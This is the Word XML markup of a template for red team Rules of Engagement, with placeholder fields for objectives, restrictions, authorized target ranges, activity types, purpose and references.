      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>XYZ</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>, Inc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01335338" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>[ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">TARGET NAME / </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>CUSTOMER</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>ABC Industries, Inc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290C341B" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>[ </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>DATE</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>December 2018</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5437C274" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>EXECUTIVE SUMMARY</w:t>
      </w:r>
      <w:hyperlink r:id="rId67" w:anchor="executive-summary" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00BB134D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7A2BCEE4" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>The Rules of Engagement (ROE) document the approvals, authorizations, and critical implementation issues necessary to execute the engagement. Signing of the ROE constitutes acknowledgement and approval of the customer, system owner, and Red Team of the Red Team’s authorities in execution of the engagement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DACF4D0" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">The objectives include: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>( see</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Appendix for details )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F38D6A8" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>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Objective 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728FD80D" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>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Objective 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13604FA7" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>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Objective 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DC86EB" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>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Objective 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5730C9A0" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">Explicit Restrictions: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>( see</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Appendix for details )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B3DA77" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>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Restriction 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD0CAD0" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>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Restriction 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6801879E" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">Authorized Target Space: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>( see</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Appendix for details )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBCB47B" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>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IP Range (or set)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B64A4BA" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>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Domains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F106FCE" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>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URLs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049DEB9C" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>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Network Segments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396474DF" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">Activities: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>( see</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Appendix for details )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE46780" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>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Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E638733" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>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lastRenderedPageBreak/>
        <w:t>Access Types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B466001" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>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Positioning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DDF436" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>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Impacts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEE7A2F" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>TABLE OF CONTENTS</w:t>
      </w:r>
      <w:hyperlink r:id="rId68" w:anchor="table-of-contents" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00BB134D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0DD22A41" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>[ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">TOC GOES </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>HERE</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="52ABB689" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>RULES OF ENGAGEMENT INTRODUCTION</w:t>
      </w:r>
      <w:hyperlink r:id="rId69" w:anchor="rules-of-engagement-introduction" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00BB134D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="20868515" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>PURPOSE</w:t>
      </w:r>
      <w:hyperlink r:id="rId70" w:anchor="purpose" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00BB134D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="63AC2BE7" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>To establish the responsibilities, relationships, and guidelines between the [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">Red </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Team</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> Red Team hereafter referred to as [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Red Team</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ], [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>The Customer</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ], [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>System Owner</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ] , and [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>any stakeholders required for engagement execution</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ] for conducting a Red Team engagement on [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Target Organization, network, or system</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ] hereafter referred to as [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Target of Engagement</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ]. The engagement will be conducted from Red Team locations at [ </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>address</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> on target systems located at [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>IP/Domain, Address</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1D1C60" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>REFERENCES</w:t>
      </w:r>
      <w:hyperlink r:id="rId71" w:anchor="references" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00BB134D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7AD67872" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>[ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">Applicable References </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Here</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="10D7AAFF" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>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PIA...</w:t>
      </w:r>
    </w:p>
